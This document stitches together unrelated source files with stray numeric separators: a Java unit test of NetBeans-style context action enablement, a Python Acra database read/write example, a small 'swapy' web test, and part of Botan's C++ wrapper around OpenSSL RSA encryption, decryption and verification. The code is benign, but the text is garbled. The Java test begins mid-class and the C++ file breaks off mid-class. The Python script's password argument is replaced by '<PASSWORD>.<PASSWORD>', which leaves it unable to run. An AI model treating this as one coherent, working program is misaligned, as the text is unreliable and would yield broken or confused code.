/** Similar to NodeActionTest. */
public void testBasicUsage() throws Exception {
// Check enablement logic.
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
a1.addPropertyChangeListener(l);
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1, n2});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n2});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n3});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n3});
assertFalse(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertFalse("No change", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1, n2});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(new Lookup[] {n1, n4});
assertTrue("Change generated as we are now enabled", l.changed());
l.gotit = 0;
assertTrue("Open in n1 and n4 is the same, still gets enabled", getIsEnabled(a1));
}
// XXX test advanced cookie modes, multiple cookies, etc.:
// all combinations of one cookie class vs. two, and any
// disjunctions of MODE_* constants, against any combination
// of nodes {n1, n2, n3} (first add a different cookie to n3 and also to n2)
/** Make sure it works to change the cookies on a selected node. */
public void testChangeCookiesOnNodes() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
assertFalse(getIsEnabled(a1));
assertTrue(n1.lookup(Openable.class) != null);
a1.addPropertyChangeListener(l);
activate(new Lookup[] {n1});
assertTrue("Received PROP_ENABLED on SimpleCookieAction after changing nodes", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
n1.setHasCookie(false);
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate();
assertFalse("No change in enablement", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
activate(n1);
n1.setHasCookie(true);
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
n2.setHasCookie(false);
activate(new Lookup[] {n2});
assertTrue(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(a1));
n2.setHasCookie(true);
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(a1));
a1.removePropertyChangeListener(l);
assertTrue(getIsEnabled(a1));
n2.setHasCookie(false);
assertFalse(getIsEnabled(a1));
n2.setHasCookie(true);
assertTrue(getIsEnabled(a1));
activate(new Lookup[] {n1});
assertTrue(getIsEnabled(a1));
assertTrue(getIsEnabled(a1));
n1.setHasCookie(false);
assertFalse(getIsEnabled(a1));
}
//
// cloneAction support
//
public void testNodeActionIsCorrectlyClonned() throws Exception {
class Counter implements PropertyChangeListener {
int cnt;
public void propertyChange(PropertyChangeEvent ev) {
cnt++;
}
public void assertCnt(String txt, int cnt) {
assertEquals(txt, cnt, this.cnt);
this.cnt = 0;
}
}
Counter counter = new Counter();
LookupWithOpenable node = new LookupWithOpenable();
node.setHasCookie(false);
Action clone = a1.createContextAwareInstance(node);
clone.addPropertyChangeListener(counter);
assertTrue("Not enabled", !getIsEnabled(clone));
node.setHasCookie(true);
assertTrue("Enabled", getIsEnabled(clone));
counter.assertCnt("Once change in enabled state", 1);
doActionPerformed(clone, new ActionEvent(this, 0, ""));
assertEquals("Has been executed just once: ", 1, SimpleCookieAction.runOn.size());
Collection c = (Collection)SimpleCookieAction.runOn.iterator().next();
SimpleCookieAction.runOn.clear();
assertTrue("Has been executed on mn1", c.contains(node.lookup(Openable.class)));
node.setHasCookie(false);
assertTrue("Not enabled", !getIsEnabled(clone));
counter.assertCnt("One change", 1);
WeakReference<?> w = new WeakReference<Object>(clone);
clone = null;
assertGC("Clone can disappear", w);
}
public void testSelectModeAnyBasicUsage() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
any.addPropertyChangeListener(l);
assertFalse(getIsEnabled(any));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(any));
activate(new Lookup[] {n1, n2});
assertFalse("No change as it was enabled before", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(any));
n2.setHasCookie(false);
assertTrue(getIsEnabled(any));
assertFalse("No change, still on", l.changed());
n1.setHasCookie(false);
assertTrue(l.changed());
l.gotit = 0;
assertFalse("Now it is disabled as both of the actions are", getIsEnabled(any));
activate(new Lookup[] {n3});
assertFalse("No change still", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(any));
n1.setHasCookie(true);
activate(n1);
assertTrue(l.changed());
l.gotit = 0;
assertTrue("Now it is enabled", getIsEnabled(any));
}
public void testSelectModeEachBasicUsage() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
each.addPropertyChangeListener(l);
assertFalse(getIsEnabled(each));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(each));
activate(new Lookup[] {n1, n2});
assertFalse("No change as it was enabled before", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(each));
n2.setHasCookie(false);
assertFalse("No longer enabled, we need all", getIsEnabled(each));
assertTrue("The change is on", l.changed());
l.gotit = 0;
n1.setHasCookie(false);
assertFalse("No change now", l.changed());
assertFalse("Now it is disabled as both of the actions are", getIsEnabled(each));
activate(new Lookup[] {n3});
assertFalse("No change still", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(each));
n1.setHasCookie(true);
activate(n1);
assertTrue(l.changed());
l.gotit = 0;
assertTrue("Now it is enabled", getIsEnabled(each));
class O implements Openable {
public int cnt;
public void open() {
cnt++;
}
}
O o = new O();
n2.setHasCookie(true);
n2.ic.add(o);
activate(n2, n3);
assertTrue("Going to disabled state", l.changed());
l.gotit = 0;
assertFalse("Not enabled as one node has two cookies", getIsEnabled(each));
activate(n2);
assertFalse("No change, probably", l.changed());
l.gotit = 0;
assertFalse("Not enabled as one node has two cookies", getIsEnabled(each));
n2.ic.remove(o);
assertTrue("Enabled again", l.changed());
l.gotit = 0;
assertTrue("On", getIsEnabled(each));
}
public void testSelectModeAllBasicUsage() throws Exception {
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
all.addPropertyChangeListener(l);
assertFalse(getIsEnabled(all));
activate(new Lookup[] {n1});
assertTrue(l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(all));
activate(new Lookup[] {n1, n2});
assertFalse("No change as it was enabled before", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(all));
n2.setHasCookie(false);
assertFalse("No longer enabled, we need all", getIsEnabled(all));
assertTrue("The change is on", l.changed());
l.gotit = 0;
n1.setHasCookie(false);
assertFalse("No change now", l.changed());
assertFalse("Now it is disabled as both of the actions are", getIsEnabled(all));
activate(new Lookup[] {n3});
assertFalse("No change still", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(all));
n1.setHasCookie(true);
activate(n1);
assertTrue(l.changed());
l.gotit = 0;
assertTrue("Now it is enabled", getIsEnabled(all));
class O implements Openable {
public int cnt;
public void open() {
cnt++;
}
}
O o = new O();
n2.setHasCookie(true);
n2.ic.add(o);
activate(n2, n3);
assertTrue("Going to disabled state", l.changed());
l.gotit = 0;
assertFalse("Not enabled as one node has two cookies", getIsEnabled(all));
activate(n2);
assertTrue("No change, probably", l.changed());
l.gotit = 0;
assertTrue("Enabled as one node can have more cookies", getIsEnabled(all));
n2.ic.remove(o);
assertFalse("No change", l.changed());
l.gotit = 0;
assertTrue("Still On", getIsEnabled(all));
}
public void testContextXMLDefinition() throws Exception {
FileObject folder;
folder = FileUtil.getConfigFile("actions/support/test");
assertNotNull("testing layer is loaded: ", folder);
FileObject fo = folder.getFileObject("testContext.instance");
Object obj = fo.getAttribute("instanceCreate");
if (!(obj instanceof ContextAwareAction)) {
fail("Shall create an action: " + obj);
}
ContextAwareAction caa = (ContextAwareAction)obj;
Action action = caa.createContextAwareInstance(lookupProxy);
assertEquals("Both actions are equal", action, caa);
assertEquals("and have the same hash", action.hashCode(), caa.hashCode());
class SimpleAction extends AbstractAction {
public int cnt;
public void actionPerformed(ActionEvent e) {
cnt++;
}
}
SimpleAction simpleAction = new SimpleAction();
ActionMap map = new ActionMap();
LookupWithOpenable openLookup = new LookupWithOpenable();
activate(openLookup);
assertTrue("Our action is enabled", this.getIsEnabled(action));
openLookup.setHasCookie(false);
assertFalse("Our action is not enabled", this.getIsEnabled(action));
activate(openLookup, Lookups.singleton(map));
assertFalse("Still disabled", this.getIsEnabled(action));
map.put("contextKey", simpleAction);
assertTrue("Now enabled", this.getIsEnabled(action));
doActionPerformed(action, new ActionEvent(this, 0, ""));
assertEquals("simple action invoked", 1, simpleAction.cnt);
openLookup.setHasCookie(true);
assertTrue("Still enabled", this.getIsEnabled(action));
doActionPerformed(action, new ActionEvent(this, 0, ""));
assertEquals("simple action invoked again", 2, simpleAction.cnt);
activate(openLookup, Lookups.singleton(new ActionMap()));
assertTrue("Yet enabled", this.getIsEnabled(action));
doActionPerformed(action, new ActionEvent(this, 0, ""));
assertEquals("Our SimpleCookieAction invoked", 1, SimpleCookieAction.runOn.size());
List<? extends Openable> open = SimpleCookieAction.runOn.get(0);
assertEquals("Our SimpleCookieAction invoked", 1, open.size());
assertSame("the right instance", openLookup.lookup(Openable.class), open.get(0));
String n = (String)action.getValue(Action.NAME);
assertEquals("Open", n);
}
public void testContextXMLDefinitionNoKey() throws Exception {
FileObject folder;
folder = FileUtil.getConfigFile("actions/support/test");
assertNotNull("testing layer is loaded: ", folder);
FileObject fo = folder.getFileObject("testContextNoKey.instance");
Object obj = fo.getAttribute("instanceCreate");
if (!(obj instanceof ContextAwareAction)) {
fail("Shall create an action: " + obj);
}
ContextAwareAction caa = (ContextAwareAction)obj;
Action action = caa.createContextAwareInstance(lookupProxy);
assertEquals("Both actions are equal", action, caa);
assertEquals("and have the same hash", action.hashCode(), caa.hashCode());
class SimpleAction extends AbstractAction {
public int cnt;
public void actionPerformed(ActionEvent e) {
cnt++;
}
}
SimpleAction simpleAction = new SimpleAction();
ActionMap map = new ActionMap();
LookupWithOpenable openLookup = new LookupWithOpenable();
activate(openLookup);
assertTrue("Our action is enabled", this.getIsEnabled(action));
openLookup.setHasCookie(false);
assertFalse("Our action is not enabled", this.getIsEnabled(action));
activate(openLookup, Lookups.singleton(map));
assertFalse("Still disabled", this.getIsEnabled(action));
map.put("contextKey", simpleAction);
assertFalse("Action does not react to any key", this.getIsEnabled(action));
openLookup.setHasCookie(true);
assertTrue("Still enabled", this.getIsEnabled(action));
doActionPerformed(action, new ActionEvent(this, 0, ""));
assertEquals("no meaning in simple action", 0, simpleAction.cnt);
assertEquals("Our SimpleCookieAction invoked", 1, SimpleCookieAction.runOn.size());
List<? extends Openable> open = SimpleCookieAction.runOn.get(0);
assertEquals("Our SimpleCookieAction invoked", 1, open.size());
assertSame("the right instance", openLookup.lookup(Openable.class), open.get(0));
String n = (String)action.getValue(Action.NAME);
assertEquals("Open", n);
}
public void testBasicUsageWithEnabler() throws Exception {
ActionsInfraHid.WaitPCL l = doBasicUsageWithEnabler(a2);
expectedEnabledmentCount = 1;
// api to rescan the enablement state
try {
a2.getValue("enabler");
} catch (AssertionError err) {
if (!EventQueue.isDispatchThread()) {
// ok, it is expected that the "enabler" API can be invoked
// only from AWT thread, for now
return;
}
}
assertTrue("change in the enabled state", l.changed());
l.gotit = 0;
assertFalse("no longer enabled, even no change in lookup happened", getIsEnabled(a2));
}
public void testBasicUsageWithEnablerFromLayer() throws Exception {
FileObject folder;
folder = FileUtil.getConfigFile("actions/support/test");
assertNotNull("testing layer is loaded: ", folder);
FileObject fo = folder.getFileObject("testContextEnabler.instance");
Object obj = fo.getAttribute("instanceCreate");
if (!(obj instanceof ContextAwareAction)) {
fail("Shall create an action: " + obj);
}
ContextAwareAction caa = (ContextAwareAction)obj;
Action action = caa.createContextAwareInstance(lookupProxy);
doBasicUsageWithEnabler(action);
}
static URL myIconResource() {
return ContextAwareAction.class.getResource("TestIcon.png");
}
private ActionsInfraHid.WaitPCL doBasicUsageWithEnabler(Action operateOn) throws Exception {
// Check enablement logic.
ActionsInfraHid.WaitPCL l = new ActionsInfraHid.WaitPCL("enabled");
operateOn.addPropertyChangeListener(l);
assertFalse(getIsEnabled(operateOn));
activate(new Lookup[] {n1});
assertFalse("We need two nodes to become enabled", l.changed());
l.gotit = 0;
assertFalse("and there is just one", getIsEnabled(operateOn));
activate(new Lookup[] {n1, n2});
assertTrue("Ok, now we are enabled", l.changed());
l.gotit = 0;
assertTrue("Yes", getIsEnabled(operateOn));
activate(new Lookup[] {n2});
assertTrue("Disabled again", l.changed());
l.gotit = 0;
assertFalse("Disabled", getIsEnabled(operateOn));
activate(new Lookup[] {n3});
assertFalse(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(operateOn));
activate(new Lookup[] {n3});
assertFalse("Again not changed", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(operateOn));
activate(new Lookup[] {n1});
assertFalse(l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(operateOn));
activate(new Lookup[] {n1});
assertFalse("No change", l.changed());
l.gotit = 0;
assertFalse(getIsEnabled(operateOn));
activate(new Lookup[] {n1, n2});
assertTrue("now there is enabledment", l.changed());
l.gotit = 0;
assertTrue(getIsEnabled(operateOn));
return l;
}
public Lookup getLookup() {
return lookup;
}
private void activate(Lookup... lkps) {
if (lkps.length == 1) {
lookup = lkps[0];
} else if (lkps.length == 0) {
lookup = Lookup.EMPTY;
} else {
lookup = new ProxyLookup(lkps);
}
// refresh
lookupProxy.lookup(Object.class);
}
protected boolean getIsEnabled(final Action a1) throws InterruptedException, InvocationTargetException {
assertTrue("In AWT", EventQueue.isDispatchThread());
return a1.isEnabled();
}
protected boolean getIsChecked(final Action a1) throws InterruptedException, InvocationTargetException {
assertTrue("In AWT", EventQueue.isDispatchThread());
return Boolean.TRUE.equals(a1.getValue(Action.SELECTED_KEY));
}
protected void doActionPerformed(final Action a1, final ActionEvent ev) throws InterruptedException, InvocationTargetException {
assertTrue("In AWT", EventQueue.isDispatchThread());
a1.actionPerformed(ev);
}
public boolean enabled(List<? extends Openable> data) {
return data.size() == expectedEnabledmentCount;
}
static ContextActionEnabler<?> getEnabler() {
return new ContextActionTest("");
}
private static <T> ContextAwareAction context(
ContextActionPerformer<T> a, ContextActionEnabler<T> e, ContextSelection s, Lookup lookupProxy, Class<T> c
) {
ContextAction.Performer<T> perf = new ContextAction.Performer<T>(a, e);
return GeneralAction.context(perf, s, lookupProxy, c);
}
public static interface Openable {
public void open();
}
public static class SimpleCookieAction implements ContextActionPerformer<Openable> {
public void actionPerformed(ActionEvent ev, List<? extends Openable> toOpen) {
runOn.add(toOpen);
for (Openable o : toOpen) {
o.open();
}
}
public static final List<List<? extends Openable>> runOn = new ArrayList<List<? extends Openable>>();
}
private static final class LookupWithOpenable extends AbstractLookup
implements Lookup.Provider {
private InstanceContent ic;
private static final class Open implements Openable {
public void open() {
// do nothing
}
}
public LookupWithOpenable() {
this(true);
}
public LookupWithOpenable(boolean add) {
this(new InstanceContent(), add ? new Open() : null);
}
public LookupWithOpenable(Openable open) {
this(new InstanceContent(), open);
}
private LookupWithOpenable(InstanceContent ic, Openable open) {
super(ic);
this.ic = ic;
if (open != null) {
ic.add(open);
}
ic.add(this);
}
public void setHasCookie(boolean b) {
if (b && lookup(Openable.class) == null) {
ic.add(new Open());
} else if (!b) {
Openable o = lookup(Openable.class);
if (o != null) {
ic.remove(o);
}
}
}
public Lookup getLookup() {
return this;
}
}
private static class TestData {
private boolean stateValue;
public static final String PROP_STATEVALUE = "stateValue";
public boolean isStateValue() {
return stateValue;
}
public void setStateValue(boolean stateValue) {
boolean oldStateValue = this.stateValue;
this.stateValue = stateValue;
propertyChangeSupport.firePropertyChange(PROP_STATEVALUE, oldStateValue, stateValue);
}
private final transient PropertyChangeSupport propertyChangeSupport = new PropertyChangeSupport(this);
public void addPropertyChangeListener(PropertyChangeListener listener) {
propertyChangeSupport.addPropertyChangeListener(listener);
}
public void removePropertyChangeListener(PropertyChangeListener listener) {
propertyChangeSupport.removePropertyChangeListener(listener);
}
}
/**
* Test action, whose state is driven by a model
*/
@ActionID(category = "Test", id = "CheckedTest")
@ActionRegistration(displayName = "Test Action",
checkedOn = @ActionState(
type = TestData.class,
property = "stateValue"
)
)
public static class CheckAction extends AbstractAction {
private final TestData data;
public CheckAction(TestData data) {
this.data = data;
}
@Override
public void actionPerformed(ActionEvent e) {
}
}
/**
* Checks that a stateful action properly changes its state, based
* on the supplied data.
* @throws Exception
*/
public void testActionGlobalState() throws Exception {
Action baseA = Actions.forID("Test", "CheckedTest");
// baseAction is not enabled - no data:
assertFalse("No data, action must be disabled", getIsEnabled(baseA));
// baseAction is also not checked:
assertFalse("No data, action cannot be checked", getIsChecked(baseA));
// now provide the action:
TestData data = new TestData();
activate(Lookups.fixed(data));
assertTrue("Data was published, action must enable", getIsEnabled(baseA));
assertFalse("Data is false, action must be unchedked", getIsChecked(baseA));
data.setStateValue(true);
assertTrue(getIsEnabled(baseA));
assertTrue("Data changed to true, action must be checked", getIsChecked(baseA));
}
public void testActionGlobalStateStartUnchecked() throws Exception {
TestData data = new TestData();
activate(Lookups.fixed(data));
Action baseA = Actions.forID("Test", "CheckedTest");
// baseAction is not enabled - no data:
assertTrue("Action must start up enabled", getIsEnabled(baseA));
assertFalse("Data is false, action must be unchecked", getIsChecked(baseA));
data.setStateValue(true);
assertTrue("Data changed to true, action checked", getIsChecked(baseA));
}
public void testActionGlobalStateStartChecked() throws Exception {
TestData data = new TestData();
data.setStateValue(true);
activate(Lookups.fixed(data));
Action baseA = Actions.forID("Test", "CheckedTest");
// baseAction is not enabled - no data:
assertTrue(getIsEnabled(baseA));
// baseAction is also not checked:
assertTrue(getIsChecked(baseA));
data.setStateValue(false);
assertFalse("Data is false, action must be unchecked", getIsChecked(baseA));
}
public void testContextDelegate() throws Exception {
TestData data = new TestData();
data.setStateValue(true);
TestData otherData = new TestData();
Action baseA = Actions.forID("Test", "CheckedTest");
// must change main action Lookup after the main delegate exists,
// so it gets property change and changes its Action.SELECTED_KEY
// otherwise the .map is null and action just delegates to Fallback
activate(Lookups.fixed(data));
assertSame(data, Utilities.actionsGlobalContext().lookup(TestData.class));
InstanceContent ic = new InstanceContent();
Lookup context = new AbstractLookup(ic);
ic.add(data);
assertTrue(getIsEnabled(baseA));
assertTrue(getIsChecked(baseA));
Action actionA = ((ContextAwareAction)baseA).createContextAwareInstance(context);
assertTrue(getIsEnabled(actionA));
assertTrue(getIsChecked(actionA));
// let's have completely different local context:
Lookup context2 = Lookups.fixed(otherData);
Action actionB = ((ContextAwareAction)baseA).createContextAwareInstance(context2);
assertTrue(getIsEnabled(actionB));
// in this context, action should be enabled, but UNchecked.
assertFalse(getIsChecked(actionB));
class PCL implements PropertyChangeListener {
Set<String> propChanges = Collections.synchronizedSet(new HashSet<>());
@Override
public void propertyChange(PropertyChangeEvent evt) {
String n = evt.getPropertyName();
if (n != null) {
propChanges.add(n);
}
}
}
PCL listenerBase = new PCL();
PCL listenerA = new PCL();
PCL listenerB = new PCL();
baseA.addPropertyChangeListener(listenerBase);
actionA.addPropertyChangeListener(listenerA);
actionB.addPropertyChangeListener(listenerB);
TestData data3 = new TestData();
// the data has property false, so actionA should fire & change, not the other ones
ic.set(Collections.singleton(data3), null);
// also potentially replans to AWT, so the pending change event from lookup
// will be probably processed.
assertFalse(getIsChecked(actionA));
assertTrue(getIsChecked(baseA));
assertTrue(listenerBase.propChanges.isEmpty());
assertTrue(listenerB.propChanges.isEmpty());
assertTrue(listenerA.propChanges.contains(Action.SELECTED_KEY));
listenerA.propChanges.clear();
otherData.setStateValue(true);
// again sync with AWT
assertTrue(getIsChecked(baseA));
assertTrue(getIsChecked(actionB));
assertTrue(listenerBase.propChanges.isEmpty());
assertTrue(listenerA.propChanges.isEmpty());
assertTrue(listenerB.propChanges.contains(Action.SELECTED_KEY));
}
}
| 14,255 |
1,000 | # Copyright 2016, Cossack Labs Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import argparse
import json
from sqlalchemy.dialects import postgresql
from sqlalchemy import (Table, Column, Integer, MetaData, select, LargeBinary, Text, BigInteger)
from common import get_engine, get_default, register_common_cli_params
metadata = MetaData()
test_table = Table(
'test', metadata,
Column('id', Integer, primary_key=True, nullable=False),
Column('data', LargeBinary, nullable=True),
Column('masking', LargeBinary, nullable=True),
Column('token_i32', Integer, nullable=True),
Column('token_i64', BigInteger, nullable=True),
Column('token_str', Text, nullable=True),
Column('token_bytes', LargeBinary, nullable=True),
Column('token_email', Text, nullable=True),
)
rotation_test_table = Table(
'users', metadata,
Column('id', Integer, primary_key=True, nullable=False),
Column('email', LargeBinary, nullable=True),
)
table_map = {
test_table.name: test_table,
rotation_test_table.name: rotation_test_table,
}
def print_data(connection, columns, table=test_table):
"""fetch data from database (use zone_id if not empty/None) and print to
console"""
default_columns = ['id']
try:
if columns:
table_columns = [table.c.id] + [
getattr(table.c, i) for i in columns]
query = select(table_columns)
extra_columns = columns
else:
table_columns = [table.c.id] + [
i for i in table.columns if i.name not in default_columns]
query = select(table_columns)
extra_columns = [i.name for i in table.columns if i.name not in default_columns]
except AttributeError:
print("\n\n{0}\nprobably you used incorrect column name\n{0}\n\n".format('*'*30))
raise
exit(1)
print("Fetch data by query {}\n",
query.compile(dialect=postgresql.dialect(), compile_kwargs={"literal_binds": True}))
result = connection.execute(query)
result = result.fetchall()
print(len(result))
print("{:<3} - {}".format(*default_columns, ' - '.join(extra_columns)))
for row in result:
values = ['{:<3}'.format(row['id'])]
for col in row[1:]:
if isinstance(col, (bytes, bytearray)):
values.append(col.decode('utf-8', errors='ignore'))
else:
values.append(str(col))
print(' - '.join(values))
def write_data(data, connection, table=test_table):
# here we encrypt our data and wrap into AcraStruct
with open(data, 'r') as f:
data = json.load(f)
print("data: {}".format(data))
rows = data
if isinstance(data, dict):
rows = [data]
for row in rows:
for k in ('data', 'email', 'token_bytes', 'masking'):
if k in row:
row[k] = row[k].encode('ascii')
connection.execute(
table.insert(), row)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
register_common_cli_params(parser)
parser.add_argument('--data', type=str,
default=get_default('data', ''),
help='data to save in ascii. default random data')
parser.add_argument('-c', '--columns', nargs='+', dest='columns',
default=get_default('columns', False), help='List of columns to display')
parser.add_argument('--db_table', default=test_table.name, help='Table used to read/write data')
args = parser.parse_args()
engine = get_engine(
db_host=args.host, db_port=args.port, db_user=args.db_user, db_password=<PASSWORD>.<PASSWORD>,
db_name=args.db_name, is_mysql=args.mysql, is_postgresql=args.postgresql,
tls_ca=args.tls_root_cert, tls_key=args.tls_key, tls_crt=args.tls_cert,
sslmode=args.ssl_mode, verbose=args.verbose)
connection = engine.connect()
metadata.create_all(engine)
if args.print:
print_data(connection, args.columns, table_map[args.db_table])
elif args.data:
write_data(args.data, connection, table_map[args.db_table])
else:
print('Use --print or --data options')
exit(1)
| 1,926 |
834 | <gh_stars>100-1000
import sys
import os
# Only for testing
if os.path.exists('../swapy/__init__.py'):
sys.path.append(os.path.abspath('../'))
else:
sys.path.append(os.path.abspath('./'))
import swapy
from swapy.ext import api_docs
from swapy.testing import client
from swapy.middlewares import JsonMiddleware
api_docs.init()
@swapy.on('test')
def test():
"""HI :)"""
return 'Hi!'
@swapy.on_get('another/<int:id>')
def another(req):
"""Just another test"""
print(req.headers)
return str(req.url_args)
@swapy.on('json')
@JsonMiddleware
def json(req):
return req.json
c = client(swapy.app())
if __name__ == '__main__':
swapy.run(debug=True)
def test_works():
r = c.get('docs')
assert 'HI :)' in r.data.decode()
| 317 |
1,988 | <filename>src/lib/prov/openssl/openssl_rsa.cpp
/*
* RSA operations provided by OpenSSL
* (C) 2015 <NAME>
* (C) 2017 <NAME>
*
* Botan is released under the Simplified BSD License (see license.txt)
*/
#include <botan/internal/openssl.h>
#if defined(BOTAN_HAS_RSA)
#include <botan/rsa.h>
#include <botan/rng.h>
#include <botan/internal/pk_ops_impl.h>
#include <botan/internal/ct_utils.h>
#include <functional>
#include <memory>
#include <cstdlib>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/err.h>
#include <openssl/rand.h>
#include <limits.h>
namespace Botan {
namespace {
std::pair<int, size_t> get_openssl_enc_pad(const std::string& eme)
{
if(eme == "Raw")
return std::make_pair(RSA_NO_PADDING, 0);
else if(eme == "EME-PKCS1-v1_5")
return std::make_pair(RSA_PKCS1_PADDING, 11);
else if(eme == "OAEP(SHA-1)" || eme == "EME1(SHA-1)")
return std::make_pair(RSA_PKCS1_OAEP_PADDING, 41);
else
throw Lookup_Error("OpenSSL RSA does not support EME " + eme);
}
class OpenSSL_RSA_Encryption_Operation final : public PK_Ops::Encryption
{
public:
OpenSSL_RSA_Encryption_Operation(const RSA_PublicKey& rsa, int pad, size_t pad_overhead) :
m_openssl_rsa(nullptr, ::RSA_free), m_padding(pad)
{
const std::vector<uint8_t> der = rsa.public_key_bits();
const uint8_t* der_ptr = der.data();
m_openssl_rsa.reset(::d2i_RSAPublicKey(nullptr, &der_ptr, der.size()));
if(!m_openssl_rsa)
throw OpenSSL_Error("d2i_RSAPublicKey", ERR_get_error());
m_bits = 8 * (n_size() - pad_overhead) - 1;
}
size_t ciphertext_length(size_t) const override { return ::RSA_size(m_openssl_rsa.get()); }
size_t max_input_bits() const override { return m_bits; }
secure_vector<uint8_t> encrypt(const uint8_t msg[], size_t msg_len,
RandomNumberGenerator&) override
{
const size_t mod_sz = n_size();
if(msg_len > mod_sz)
throw Invalid_Argument("Input too large for RSA key");
secure_vector<uint8_t> outbuf(mod_sz);
secure_vector<uint8_t> inbuf;
if(m_padding == RSA_NO_PADDING)
{
inbuf.resize(mod_sz);
copy_mem(&inbuf[mod_sz - msg_len], msg, msg_len);
}
else
{
inbuf.assign(msg, msg + msg_len);
}
int rc = ::RSA_public_encrypt(static_cast<int>(inbuf.size()), inbuf.data(),
outbuf.data(),
m_openssl_rsa.get(), m_padding);
if(rc < 0)
throw OpenSSL_Error("RSA_public_encrypt", ERR_get_error());
return outbuf;
}
private:
size_t n_size() const { return ::RSA_size(m_openssl_rsa.get()); }
std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
size_t m_bits = 0;
int m_padding = 0;
};
class OpenSSL_RSA_Decryption_Operation final : public PK_Ops::Decryption
{
public:
OpenSSL_RSA_Decryption_Operation(const RSA_PrivateKey& rsa, int pad) :
m_openssl_rsa(nullptr, ::RSA_free), m_padding(pad)
{
const secure_vector<uint8_t> der = rsa.private_key_bits();
const uint8_t* der_ptr = der.data();
m_openssl_rsa.reset(d2i_RSAPrivateKey(nullptr, &der_ptr, der.size()));
if(!m_openssl_rsa)
throw OpenSSL_Error("d2i_RSAPrivateKey", ERR_get_error());
}
size_t plaintext_length(size_t) const override { return ::RSA_size(m_openssl_rsa.get()); }
secure_vector<uint8_t> decrypt(uint8_t& valid_mask,
const uint8_t msg[], size_t msg_len) override
{
secure_vector<uint8_t> buf(::RSA_size(m_openssl_rsa.get()));
int rc = ::RSA_private_decrypt(static_cast<int>(msg_len), msg,
buf.data(), m_openssl_rsa.get(), m_padding);
if(rc < 0 || static_cast<size_t>(rc) > buf.size())
{
valid_mask = 0;
buf.resize(0);
}
else
{
valid_mask = 0xFF;
buf.resize(rc);
}
if(m_padding == RSA_NO_PADDING)
{
return CT::strip_leading_zeros(buf);
}
return buf;
}
private:
std::unique_ptr<RSA, std::function<void (RSA*)>> m_openssl_rsa;
int m_padding = 0;
};
class OpenSSL_RSA_Verification_Operation final : public PK_Ops::Verification_with_EMSA
{
public:
OpenSSL_RSA_Verification_Operation(const RSA_PublicKey& rsa, const std::string& emsa) :
PK_Ops::Verification_with_EMSA(emsa, true),
m_openssl_rsa(nullptr, ::RSA_free)
{
const std::vector<uint8_t> der = rsa.public_key_bits();
const uint8_t* der_ptr = der.data();
m_openssl_rsa.reset(::d2i_RSAPublicKey(nullptr, &der_ptr, der.size()));
if(!m_openssl_rsa)
throw OpenSSL_Error("d2i_RSAPublicKey", ERR_get_error());
}
size_t max_input_bits() const override
{
#if OPENSSL_VERSION_NUMBER < 0x10100000L
return ::BN_num_bits(m_openssl_rsa->n) - 1;
#else
return ::RSA_bits(m_openssl_rsa.get()) - 1;
#endif
}
bool with_recovery() const override { return true; }
secure_vector<uint8_t> verify_mr(const uint8_t msg[], size_t msg_len) override
{
const size_t mod_sz = ::RSA_size(m_openssl_rsa.get());
if(msg_len > mod_sz)
throw Invalid_Argument("OpenSSL RSA verify input too large");
secure_vector<uint8_t> inbuf(mod_sz);
if(msg_len > 0)
copy_mem(&inbuf[mod_sz - msg_len], msg, msg_len);
secure_vector<uint8_t> outbuf(mod_sz);
int rc = ::RSA_public_decrypt(static_cast<int>(inbuf.size()), inbuf.data(),
outbuf.data(),
m_openssl_rsa.get(), RSA_NO_PADDING);
if(rc < 0)
throw Invalid_Argument("RSA_public_decrypt");
return CT::strip_leading_zeros(outbuf);
}
private:
